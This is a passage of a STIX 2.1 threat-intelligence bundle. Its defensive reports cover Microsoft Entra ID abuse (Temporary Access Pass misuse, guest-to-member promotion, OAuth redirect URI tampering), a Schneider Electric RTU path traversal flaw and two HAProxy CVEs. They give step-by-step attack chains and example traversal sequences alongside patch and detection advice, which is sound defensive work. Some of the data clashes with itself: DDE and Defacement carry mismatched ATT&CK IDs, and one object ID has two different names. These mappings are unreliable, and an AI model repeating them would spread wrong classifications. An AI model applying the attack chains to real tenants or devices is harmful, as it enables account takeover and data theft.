      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d6010270-7067-519c-988f-e64183821a4f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08d12749-05e6-539e-8a98-5701be5a2b67",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--08d12749-05e6-539e-8a98-5701be5a2b67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Microsoft Entra ID Temporary Access Pass (TAP) Abuse for MFA Bypass and Persistence",
      "description": "## Overview\n\nThis threat details the abuse of the Temporary Access Pass (TAP) feature within Microsoft Entra ID by malicious actors. An attacker who has gained User Administrator or Authentication Administrator privileges can exploit these roles to create a TAP for any target Entra ID user account. TAPs are a powerful credential, as they are time-limited, allow for passwordless authentication, and crucially, bypass all existing Multi-Factor Authentication (MFA) requirements, including phishing-resistant methods. Threat actors leverage this capability to sign into compromised accounts without needing the original password, and critically, register new, persistent authentication methods (such as FIDO2 security keys or Microsoft Authenticator app registrations) before the TAP expires. This establishes a durable backdoor, enabling continued unauthorized access, lateral movement, and potential data exfiltration, even if the initial compromise vector is remediated and the TAP itself expires.\n\n## Attack Chain\n\n1.  Attacker gains User Administrator or Authentication Administrator privileges within Microsoft Entra ID through an undisclosed initial access vector.\n2.  Leveraging these elevated administrative privileges, the attacker creates a Temporary Access Pass (TAP) for a target Entra ID user account, which is recorded in `azure.auditlogs`.\n3.  The generated TAP acts as a time-limited, single-use passcode that bypasses all existing MFA policies and requirements for the target account.\n4.  The attacker uses the newly issued TAP to successfully sign into the target user account, as evidenced by entries in `azure.signinlogs` with \"Temporary Access Pass\" as the authentication method.\n5.  During the active session authenticated by the TAP, the attacker registers one or more new, persistent authentication methods (e.g., FIDO2 security key, Microsoft Authenticator app) for the compromised account.\n6.  Upon expiration or revocation of the TAP, the attacker retains persistent access to the target account via the newly registered authentication methods, bypassing the original password and MFA setup.\n7.  With persistent access, the attacker can proceed with objectives such as data exfiltration, lateral movement within the cloud environment, or further privilege escalation.\n\n## Impact\n\nThe successful exploitation of the Entra ID TAP feature can lead to complete account compromise, effectively bypassing all MFA protections in place, including phishing-resistant methods. Attackers can establish long-term persistence within an organization's cloud environment by registering new authentication methods, rendering password changes or MFA resets ineffective without careful post-incident remediation. This can result in unauthorized access to sensitive data, financial systems, or critical infrastructure, and enable further lateral movement within the compromised cloud tenancy. While specific victim numbers are not provided, organizations heavily reliant on Microsoft Entra ID for identity management are at risk, particularly those with insufficiently protected administrative accounts.\n\n## Recommendation\n\n*   Deploy the Sigma rules provided in this brief to your SIEM, specifically the rules detecting 'Microsoft Entra ID Temporary Access Pass Creation', 'Microsoft Entra ID Sign-in Using Temporary Access Pass', and 'New Authentication Method Registration in Entra ID'.\n*   Enable comprehensive logging for `azure.auditlogs` and `azure.signinlogs` within Microsoft Entra ID to ensure telemetry is available for the detection rules.\n*   Regularly audit the assignments for 'User Administrator' and 'Authentication Administrator' roles in Microsoft Entra ID, ensuring least privilege and strong protections for these accounts.\n*   Implement strict change management processes for all identity-related administrative actions to identify unauthorized TAP creations in `azure.auditlogs`.\n",
      "published": "2026-06-18T15:39:09Z",
      "labels": [
        "cloud",
        "identity",
        "azure",
        "entra-id",
        "mfa-bypass",
        "persistence",
        "lateral-movement",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/entra/identity/authentication/howto-authentication-temporary-access-pass"
        },
        {
          "source_name": "reference",
          "url": "https://dirkjanm.io/lateral-movement-and-hash-dumping-with-temporary-access-passes-microsoft-entra/"
        },
        {
          "source_name": "reference",
          "url": "https://specterops.io/blog/2023/03/29/id-tap-that-pass/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--670ec73d-ecca-5503-8a61-6bfba6b8183e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--83a66d95-7a24-5705-80a5-9f7c4d185c1f",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--83a66d95-7a24-5705-80a5-9f7c4d185c1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Microsoft Entra ID Guest Account Promoted to Member",
      "description": "## Overview\n\nA sophisticated threat actor, having already established initial access to an organization's Microsoft Entra ID tenant through the compromise of a guest account, can achieve persistent access and elevate privileges by converting the compromised guest account to a member account. This high-impact technique, observed in campaigns targeting cloud environments, leverages the \"Update user\" operation to modify the `UserType` attribute. By changing an account from 'Guest' to 'Member', attackers gain full directory read access, bypass external-identity Conditional Access policies, and make the account appear as a standard internal employee, effectively masking their continued presence. This method of persistence is particularly insidious as it often avoids detection mechanisms designed for explicit role assignments, offering a stealthier way to maintain control and facilitate further malicious activities such as reconnaissance and data exfiltration. Defenders must monitor for these specific user attribute changes to detect such advanced persistence.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker compromises an existing legitimate guest account within an Entra ID tenant, typically through methods like phishing, credential stuffing, or supply chain compromise targeting an external partner.\n2.  **Privilege Escalation/Compromise**: The attacker subsequently compromises an administrator account or gains sufficient permissions within the Entra ID tenant to modify user properties.\n3.  **UserType Modification**: Using the compromised administrative privileges, the attacker executes an \"Update user\" operation within Entra ID, specifically targeting the previously compromised guest account.\n4.  **Property Update**: During this \"Update user\" operation, the `UserType` attribute of the guest account is changed from `Guest` to `Member`.\n5.  **Enhanced Permissions**: This conversion automatically grants the now-modified account full directory read access, which is typically restricted for external guest accounts.\n6.  **Conditional Access Bypass**: The conversion also removes external-identity-specific Conditional Access restrictions, allowing the account to operate with fewer security constraints.\n7.  **Stealthy Persistence**: The newly converted \"Member\" account is virtually indistinguishable from a standard internal employee account, establishing persistent access that often bypasses detection mechanisms for explicit role assignments.\n8.  **Post-Exploitation**: The attacker leverages the \"Member\" account for broader reconnaissance, directory enumeration (e.g., via Graph API `/users`, `/groups`, `/applications`), data exfiltration, or further lateral movement within the organization's cloud environment.\n\n## Impact\n\nSuccessful exploitation results in an attacker maintaining stealthy, persistent access to the victim organization's Microsoft Entra ID environment. The compromised account gains full directory read access, enabling extensive reconnaissance and mapping of cloud resources and user identities. Furthermore, the bypass of external-identity Conditional Access policies allows the attacker to operate with fewer restrictions, potentially facilitating data exfiltration, further privilege escalation, and lateral movement into integrated cloud applications. This technique leads to long-term compromise, making detection and remediation challenging as the account appears benign.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment.\n*   Ensure comprehensive logging for `azure.auditlogs` events is enabled and ingested into your security monitoring platform.\n*   Investigate all `Update user` operations where `UserType` changes from `Guest` to `Member` by examining the `initiated_by` field for authorization.\n*   Proactively review `azure.signinlogs.*` for any directory enumeration patterns (e.g., access to Graph API `/users`, `/groups`, `/applications`) originating from recently converted accounts.\n*   Implement strict change management processes for all B2B collaboration migrations or organizational restructuring that involves legitimate Guest-to-Member conversions, ensuring proper documentation and approval.\n",
      "published": "2026-06-18T15:40:23Z",
      "labels": [
        "cloud",
        "identity",
        "persistence",
        "azure",
        "microsoft-entra-id"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/entra/external-id/user-properties"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/entra/identity/users/convert-external-users-internal"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_guest_account_promoted_to_member.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Modify Authentication Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1556",
          "url": "https://attack.mitre.org/techniques/T1556"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--678ac022-0ece-5e8b-8718-898372a5a884",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--39deac5d-e18a-55fc-8c0c-ff84457fa4e8",
      "target_ref": "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Application Access Token",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1528",
          "url": "https://attack.mitre.org/techniques/T1528"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3fbf7be0-5f1b-5bcf-8d4a-9412a1cfbcc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--39deac5d-e18a-55fc-8c0c-ff84457fa4e8",
      "target_ref": "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--39deac5d-e18a-55fc-8c0c-ff84457fa4e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Entra ID OAuth Application Redirect URI Modified",
      "description": "## Overview\n\nThis threat involves adversaries abusing legitimate Microsoft Entra ID (formerly Azure Active Directory) functionality to achieve persistence and credential access. Attackers modify existing, trusted OAuth 2.0 application registrations by adding an attacker-controlled redirect URI (ReplyUrl). This subtle change allows the interception of OAuth authorization codes when legitimate users authenticate to the compromised application. Unlike registering a new application or requiring explicit user consent, modifying an existing application's redirect URI can go unnoticed, maintaining all prior user consents. This technique enables token theft, granting attackers unauthorized access to resources such as Mail, Files, or directory scopes associated with the affected application, posing a significant risk to an organization's identity infrastructure. The technique is detailed in Microsoft's guidance on OAuth redirection abuse.\n\n## Attack Chain\n\n1.  **Initial Access / Reconnaissance**: Attacker gains access to an Entra ID tenant with permissions to modify application registrations (e.g., via compromised credentials of an administrator or application owner).\n2.  **Application Identification**: Attacker identifies a high-value, trusted OAuth 2.0 application registration within Entra ID that has existing user consents and valuable permissions (e.g., Mail.Read, Files.ReadWrite, Directory.Read.All).\n3.  **Redirect URI Modification**: Attacker modifies the identified application's `ReplyUrls` property, adding an attacker-controlled domain or endpoint as a valid redirect URI. This modification is logged as an \"Update application\" event in Azure Audit Logs.\n4.  **Token Interception Setup**: The attacker sets up a web server at the newly added redirect URI to act as an OAuth authorization endpoint, designed to capture authorization codes or tokens redirected by Entra ID.\n5.  **User Authentication Trigger**: Legitimate users attempt to access the compromised application, initiating the standard OAuth 2.0 authorization flow.\n6.  **Authorization Code Redirection**: Entra ID, following the legitimate OAuth flow, redirects the user's browser (along with the authorization code) to one of the registered `ReplyUrls`, which now includes the attacker's controlled URI.\n7.  **Token Theft**: The attacker's endpoint intercepts the authorization code. The attacker then exchanges this code for an access token and potentially a refresh token, gaining unauthorized access to the user's resources via the compromised application's permissions.\n8.  **Post-Exploitation**: Attacker uses the stolen tokens to access data, execute actions, or maintain persistence within the target environment (e.g., read emails, exfiltrate files, escalate privileges).\n\n## Impact\n\nThe impact of successful OAuth redirect URI modification and subsequent token theft can be severe. Attackers gain unauthorized access to an organization's cloud resources, including sensitive data within mailboxes, files, and directory services, depending on the permissions granted to the compromised application. This technique bypasses traditional multi-factor authentication (MFA) protections as it relies on token interception after a legitimate authentication event. The breach can lead to data exfiltration, business email compromise (BEC), and further privilege escalation within the Azure/Microsoft 365 environment, potentially affecting all users of the targeted application. Since this attack leverages trusted applications, it's often difficult for end-users to identify.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM to detect \"Update application\" events targeting `AppAddress` properties or modifications to `ReplyUrls` in Entra ID.\n*   Investigate all `Update application` events in Entra ID Audit Logs, specifically reviewing `azure.auditlogs.properties.initiated_by` to identify the actor and `target_resources.modified_properties` to check changes to `ReplyUrls`.\n*   Establish strict change management processes for application registrations in Entra ID, especially for those with high-privilege Graph API permissions, referencing the `references` section for best practices.\n*   Regularly review the `ReplyUrls` of critical applications for any unauthorized or suspicious entries, and specifically geolocate and WHOIS the domains of newly added URIs as recommended in the rule description.\n",
      "published": "2026-06-18T15:41:56Z",
      "labels": [
        "cloud",
        "identity",
        "azure",
        "persistence",
        "credential-access",
        "token-theft",
        "microsoft-entra-id"
      ],
      "object_refs": [
        "attack-pattern--123affda-6f11-58dc-8db2-3ea6a4c43493",
        "attack-pattern--d3a58f2c-9521-50dc-be06-a5f640e2a92c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/entra/identity-platform/reply-url"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2026/03/02/oauth-redirection-abuse-enables-phishing-malware-delivery/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--882b4c89-ac58-5df4-a8b7-d863fd2f8227",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1c563b27-aafa-5de2-aa67-49ec5ba7877e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--369d498d-e49f-5d06-b142-c27e72f08061",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1c563b27-aafa-5de2-aa67-49ec5ba7877e",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1c563b27-aafa-5de2-aa67-49ec5ba7877e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Schneider Electric EasyLogic T150 \u0026 Saitel DP Path Traversal Vulnerability (CVE-2026-6865)",
      "description": "## Overview\n\nCISA has reported a high-severity path traversal vulnerability, CVE-2026-6865, affecting Schneider Electric EasyLogic T150 (formerly Saitel DR) and Saitel DP Remote Terminal Unit \u0026 Controller firmware. This flaw stems from improper validation of user-supplied input when processing file paths on the device's server-side components. Exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive files stored on the device, potentially impacting critical infrastructure sectors such as Energy and Critical Manufacturing worldwide. All versions of EasyLogic T150 firmware up to and including 11.06.31, and Saitel DP firmware up to and including 11.06.36, are affected. Patches are available in EasyLogic T150 firmware version 11.06.32 and Saitel DP firmware version 11.06.37. CISA confirms no known public exploitation of this vulnerability at the time of publication.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a vulnerable Schneider Electric EasyLogic T150 or Saitel DP device exposed to the network, potentially through an internet-facing web interface or via an already compromised internal network segment.\n2.  **Reconnaissance**: The attacker probes the device's exposed network services or web interface to identify parameters or endpoints responsible for handling file or directory requests.\n3.  **Malicious Request Crafting**: The attacker constructs a specially crafted HTTP request or network service call that includes directory traversal sequences (e.g., `../`, `..\\`, `..%2f`, `..%5c`) within a parameter intended for file path input.\n4.  **Vulnerability Exploitation**: The vulnerable firmware on the EasyLogic T150 or Saitel DP device fails to properly sanitize or validate the user-supplied path, allowing the traversal sequences to navigate outside the intended restricted directory.\n5.  **Sensitive File Access**: The device's server-side component, acting on the malformed path, returns the contents of sensitive system files (e.g., configuration files, log files, credential stores) from an arbitrary location on the device's file system.\n6.  **Data Exfiltration**: The attacker collects and exfiltrates the sensitive information obtained, which could include operational data, system configurations, or authentication credentials, from the remote terminal unit.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-6865 grants attackers unauthorized access to sensitive files on critical ICS/OT devices, specifically Schneider Electric EasyLogic T150 and Saitel DP Remote Terminal Units. This could lead to a compromise of the confidentiality of operational data, configuration settings, or potentially credentials, impacting the Energy and Critical Manufacturing sectors. Unauthorized access to such information on RTUs, which are often deployed in critical infrastructure, could enable further attacks, facilitate lateral movement within the OT network, or provide intelligence for more sophisticated disruptions, ultimately threatening the integrity and availability of industrial processes.\n\n## Recommendation\n\n*   Immediately apply firmware version 11.06.32 for Schneider Electric EasyLogic T150 (formerly Saitel DR) and firmware version 11.06.37 for Schneider Electric Saitel DP to remediate CVE-2026-6865.\n*   Configure network firewalls to restrict access to Schneider Electric EasyLogic T150 and Saitel DP devices to only necessary management workstations and IP ranges.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically monitoring web server logs for path traversal attempts on ICS devices.\n*   Ensure strict credential controls are in place, even for low-privilege users, and follow product security recommendations for isolation and credentials as mitigation against unauthorized access.\n",
      "published": "2026-06-18T17:00:47Z",
      "labels": [
        "ics",
        "ot",
        "firmware",
        "path-traversal",
        "cve",
        "industrial-control-system"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-169-04"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6865"
        },
        {
          "source_name": "reference",
          "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-132-03\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-132-03.pdf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36e788c2-29ba-5928-ab8a-9c8a95eb1c5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d7634f6f-9284-5a11-81bf-bac13bf44151",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b4b9a20a-c1bf-54b6-be75-3b2b7f79fc86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Dynamic Data Exchange",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1221",
          "url": "https://attack.mitre.org/techniques/T1221"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1e52fda-aee3-516f-85f7-ae2804f9bb9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d7634f6f-9284-5a11-81bf-bac13bf44151",
      "target_ref": "attack-pattern--b4b9a20a-c1bf-54b6-be75-3b2b7f79fc86"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Defacement",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77104c3b-66a7-59c3-9940-4bdd763e8f67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d7634f6f-9284-5a11-81bf-bac13bf44151",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d7634f6f-9284-5a11-81bf-bac13bf44151",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-55203 HAProxy Integer Overflow in FastCGI Handling",
      "description": "## Overview\n\nCVE-2026-55203 impacts HAProxy versions up to and including 3.4.0, stemming from an integer overflow within the `fcgi_conn` structure's `drl` field. This vulnerability is triggered when HAProxy receives a FastCGI record from a backend where `contentLength` is precisely 65535 and `paddingLength` is 1 or more. Under these specific conditions, the `drl` field wraps to 0, causing HAProxy to misinterpret subsequent data as new FastCGI record headers. This desynchronization of the FCGI framing parser enables malicious FastCGI backends to manipulate HAProxy's internal state, potentially resulting in request routing errors, response smuggling, or various memory safety issues. Organizations utilizing HAProxy as a reverse proxy for FastCGI applications are particularly susceptible, making immediate patching crucial.\n\n## Attack Chain\n\n1.  An attacker establishes or compromises a FastCGI backend service configured to communicate with a vulnerable HAProxy instance.\n2.  The malicious FastCGI backend constructs and sends a specially crafted FastCGI record to HAProxy.\n3.  The crafted FastCGI record includes a `contentLength` value of 65535 and a `paddingLength` of 1 or more.\n4.  HAProxy receives and attempts to process this record, triggering an integer overflow in the `fcgi_conn` structure's `drl` field, causing the field to wrap to 0.\n5.  Due to the `drl` field's incorrect value, HAProxy misinterprets the subsequent data stream from the backend as new FastCGI record headers.\n6.  This misinterpretation desynchronizes HAProxy's internal FastCGI framing parser, leading to incorrect consumption of subsequent records.\n7.  The desynchronization allows the attacker to control HAProxy's processing, potentially leading to request routing errors (e.g., client request routed to wrong backend), response smuggling (e.g., appending arbitrary content to legitimate responses), or various memory safety issues (e.g., crashes, arbitrary code execution).\n8.  The ultimate objective is achieved, ranging from data manipulation, unauthorized access, to denial of service or remote code execution depending on the specific memory safety issue exploited.\n\n## Impact\n\nThe successful exploitation of CVE-2026-55203 can lead to severe consequences, with a CVSS v3.1 Base Score of 7.5. Primary impacts include the desynchronization of HAProxy's FastCGI parser, enabling attackers to cause request routing errors, potentially redirecting user traffic to unintended services or malicious content. More critically, it can facilitate response smuggling, where attackers can inject arbitrary data or even entire unauthorized responses into a legitimate client's connection. Furthermore, the underlying integer overflow can lead to various memory safety issues, potentially resulting in HAProxy crashes, denial-of-service, information disclosure, or even remote code execution, undermining the stability and security of the proxy layer.\n\n## Recommendation\n\n*   Patch CVE-2026-55203 immediately by updating HAProxy to a version beyond 3.4.0 (e.g., 3.4.1 or later containing commit 5985276).\n*   Deploy the Sigma rule \"CVE-2026-55203 - Detect HAProxy FCGI Parsing Errors\" to your SIEM to identify internal errors indicative of attempted exploitation.\n*   Deploy the Sigma rule \"CVE-2026-55203 - Detect High Volume of HAProxy 5xx Errors\" to monitor for unusual spikes in server-side errors that could signal instability or routing issues caused by exploitation.\n*   Enable comprehensive logging for HAProxy and its FastCGI backends, including detailed error messages, to facilitate investigation.\n",
      "published": "2026-06-18T17:23:08Z",
      "labels": [
        "vulnerability",
        "haproxy",
        "fastcgi",
        "integer-overflow",
        "webserver",
        "proxy"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--b4b9a20a-c1bf-54b6-be75-3b2b7f79fc86",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55203"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd806fbc-0edd-51ff-b34d-b318060dc1d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a118eb3b-ff42-5b57-9bd4-ff8ab9281954",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a118eb3b-ff42-5b57-9bd4-ff8ab9281954",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-55204: HAProxy Null Pointer Dereference Leads to Denial of Service",
      "description": "## Overview\n\nHAProxy through version 3.4.0 is affected by CVE-2026-55204, a null pointer dereference vulnerability residing in the `hpack_dht_insert()` function within `src/hpack-tbl.c`. This flaw occurs because the function fails to validate the return value of `hpack_dht_defrag()` when the memory pool is exhausted. An unauthenticated attacker can exploit this by sending specially crafted HTTP/2 requests that trigger excessive HPACK dynamic table insertions. By intentionally inducing memory pressure, the attacker forces `hpack_dht_defrag()` to return a NULL pointer, which `hpack_dht_insert()` then attempts to dereference. This action crashes HAProxy worker processes, leading to a denial of service for all services fronted by the vulnerable HAProxy instance. The vulnerability was fixed in commit `9a6d1fe`.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious HTTP/2 request**: An unauthenticated attacker sends specifically designed HTTP/2 requests targeting a vulnerable HAProxy instance.\n2.  **Request triggers HPACK dynamic table insertions**: The crafted request's headers are designed to cause numerous HPACK dynamic table insertions within the HAProxy worker process.\n3.  **Memory pressure induced**: These excessive insertions consume memory, leading to memory pressure on the targeted HAProxy worker process.\n4.  **`hpack_dht_defrag()` returns NULL**: Under severe memory exhaustion, the `hpack_dht_defrag()` function, called by `hpack_dht_insert()`, fails to allocate memory and returns a NULL pointer.\n5.  **Null pointer dereference occurs**: The `hpack_dht_insert()` function proceeds without validating the NULL return value, attempting to dereference this invalid pointer.\n6.  **HAProxy worker process crashes**: This dereference results in a critical error, causing the targeted HAProxy worker process to unexpectedly terminate.\n7.  **Denial of Service**: Repeated exploitation of this vulnerability leads to cascading crashes of HAProxy worker processes, rendering the HAProxy instance unable to process legitimate requests and causing a denial of service for all services it fronts.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55204 results in a denial of service for services load-balanced or proxied by the vulnerable HAProxy instance. This can lead to severe business disruption, including website or application unavailability, financial losses due to interrupted services, and reputational damage. While no specific victim counts are detailed, any organization utilizing affected HAProxy versions as a critical infrastructure component is at risk. The impact is primarily on system availability, with no direct impact on confidentiality or integrity unless other systems rely on HAProxy's functionality in a critical security path.\n\n## Recommendation\n\n*   Immediately **patch** HAProxy installations by updating to a version containing the fix for CVE-2026-55204, specifically referencing commit `9a6d1fe` or later versions.\n*   Deploy the Sigma rule \"Detects HAProxy Process Crashes (CVE-2026-55204 Impact)\" to monitor for unexpected `haproxy` process terminations.\n*   Implement the Sigma rule \"Detects High Rate of HAProxy 5xx Errors\" to identify unusual spikes in server-side HTTP errors, which may indicate a denial-of-service condition or ongoing exploitation.\n*   Configure HAProxy to limit HTTP/2 header sizes and HPACK dynamic table sizes to reduce the attack surface for memory exhaustion attacks, if applicable to your configuration.\n",
      "published": "2026-06-18T17:24:14Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "HAProxy",
        "CVE-2026-55204"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
